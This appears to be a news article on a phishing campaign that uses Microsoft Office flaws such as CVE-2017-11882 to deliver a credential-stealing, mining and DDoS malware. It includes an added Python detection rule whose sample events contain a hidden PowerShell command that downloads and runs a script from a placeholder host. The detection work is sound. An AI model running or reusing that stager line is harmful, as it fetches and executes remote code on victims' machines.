Hackers are exploiting vulnerabilities in Microsoft Office software to spread a sophisticated form of malware that’s capable of stealing credentials, dropping additional malware, cryptocurrency mining, and conducting distributed denial-of-service (DDoS) attacks.
The malware has been active since 2016 and, despite its powerful capabilities, it’s available to purchase on underground forums for as little as $75.
Researchers at FireEye have observed a new campaign attempting to deliver the malware via spam emails to targets in the telecommunications, insurance, and financial services industries, with all of these attacks attempting to exploit recent vulnerabilities uncovered in Microsoft Office software.
The phishing emails are designed to be relevant to the selected target and include a ZIP file containing a malicious lure document, which users are encouraged to open. Once the Microsoft Office document file is accessed, the Office vulnerabilities are exploited and the PowerShell-based payload is run, infecting the victim.
One of the vulnerabilities exploited by the attackers is CVE-2017-11882. Disclosed in December, it’s a security vulnerability in Microsoft Office which enables arbitrary code to run when a maliciously modified file is opened. In the case of this campaign, the vulnerability allows an additional download to be triggered using a URL stored within the malicious attachment. The download contains the PowerShell script which drops the malware.
If the PowerShell script is successfully run, it injects code which downloads the final payload from the malicious command and control server, which unpacks the malware onto the target computer, alongside functions which allow the attacker to use Tor to hide their tracks. The malware also contains various plugins allowing the attackers to secretly gain access to almost every type of data stored on the machine.
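The infection chain described above, a lure document that hands off to a PowerShell stager which then fetches the final payload, is exactly what endpoint process-creation telemetry exposes. As an added example that is not from the article or from FireEye's report, here is a small Python detection rule run over constructed Sysmon-style events; the process paths and command lines are invented for illustration, and EQNEDT32.EXE is the Equation Editor component affected by CVE-2017-11882.

```python
import ntpath

# Office components a lure document's exploit code would run under.
# EQNEDT32.EXE is the Equation Editor component affected by CVE-2017-11882.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "eqnedt32.exe"}
# Script hosts that a document being opened should never need to launch.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
# Command-line fragments typical of a stager that pulls a second stage from a URL.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "http://", "https://", "-w hidden", "bypass")


def base(path):
    """Lower-cased file name of a Windows path; ntpath handles backslashes on any OS."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return (severity, reason) for one process-creation event, or None if it looks benign."""
    parent, image = base(event["parent"]), base(event["image"])
    if parent not in OFFICE_PARENTS or image not in SCRIPT_HOSTS:
        return None
    cmd = event["cmdline"].lower()
    hits = [m for m in DOWNLOAD_MARKERS if m in cmd]
    if hits:
        return ("high", f"{parent} -> {image} with stager markers {hits}")
    return ("medium", f"{parent} -> {image} (Office spawning a script host)")


def scan(events):
    """Run the rule over a batch of events and return only the ones that fire."""
    alerts = []
    for event in events:
        verdict = classify(event)
        if verdict is not None:
            alerts.append((base(event["image"]),) + verdict)
    return alerts


# Constructed sample events (Sysmon-style fields invented for this example, not real telemetry).
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1'))"},
    {"parent": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c start calc.exe"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The first event fires as high (Office parent plus download markers), the second as medium (Equation Editor spawning cmd.exe with no download markers), and the explorer.exe-launched script does not fire at all.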
Among the features the malware offers attackers is the ability to steal passwords from popular web browsers, FTP applications, and email accounts.
The malware can also steal from cryptocurrency wallets and steal licence keys of more than 200 popular software applications, including Office, SQL Server, Adobe, and Nero.
In addition to being able to steal from an infected user, the attackers can also rope the infected machine into a larger network of computers to help carry out DDoS attacks, and can use the machines as a tool for mining cryptocurrency. The malware is advertised across a range of popular underground forums.